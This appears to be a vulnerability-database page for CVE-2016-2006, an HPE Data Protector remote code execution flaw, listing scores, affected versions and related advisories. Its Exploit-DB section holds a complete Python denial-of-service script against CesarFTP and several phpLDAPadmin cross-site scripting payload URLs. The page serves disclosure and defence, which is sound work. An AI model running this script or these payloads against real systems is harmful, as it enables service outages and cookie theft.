CVE-2016-2006
published 2016-04-21CVE-2016-2006: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors, aka…
PriorityP269critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
20.41%
97.2th percentile
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors, aka ZDI-CAN-3353.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | data_protector | >= 7.0 < 7.03_108 | 7.03_108 |
| hp | data_protector | >= 8.0 < 8.15 | 8.15 |
| hp | data_protector | >= 9.0 < 9.06 | 9.06 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat8.1HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jj58-9fp6-rq2w: HPE Data Protector before 7
ghsa_unreviewed·2022-05-14
CVE-2016-2006 [CRITICAL] GHSA-jj58-9fp6-rq2w: HPE Data Protector before 7
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors, aka ZDI-CAN-3353.
Red Hat
perl-DBD-MySQL: Use after free when using prepared statements
vendor_redhat·2016-11-18·CVSS 8.1
CVE-2016-1251 [HIGH] CWE-416 perl-DBD-MySQL: Use after free when using prepared statements
perl-DBD-MySQL: Use after free when using prepared statements
There is a vulnerability of type use-after-free affecting DBD::mysql (aka DBD-mysql or the Database Interface (DBI) MySQL driver for Perl) 3.x and 4.x before 4.041 when used with mysql_server_prepare=1.
Mitigation: This problem is only exposed when the user uses server-side prepared statement support (mysql_server_prepare=1), which is NOT default behavior and was turned off back for all drivers per MySQL AB decision in 2006 due to issues with server-side prepared statements in the server.
Use the default driver setting which uses emulated prepared statements.
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 5) - Will not fix
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 6) - Will not fix
Package: perl-DBD-MySQL (Red Ha
No detection rules found.
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
exploitdb·2016-11-01
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
---
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
CVE-2006-2961 CesarFTP 0.99g - XCWD Denial of Service
CesarFTP 0.99g - XCWD Denial of Service
---
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
Exploit-DB
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
http://www.securitytracker.com/id/1035631http://www.zerodayinitiative.com/advisories/ZDI-16-246https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05085988http://www.securitytracker.com/id/1035631http://www.zerodayinitiative.com/advisories/ZDI-16-246https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05085988
2016-04-21
Published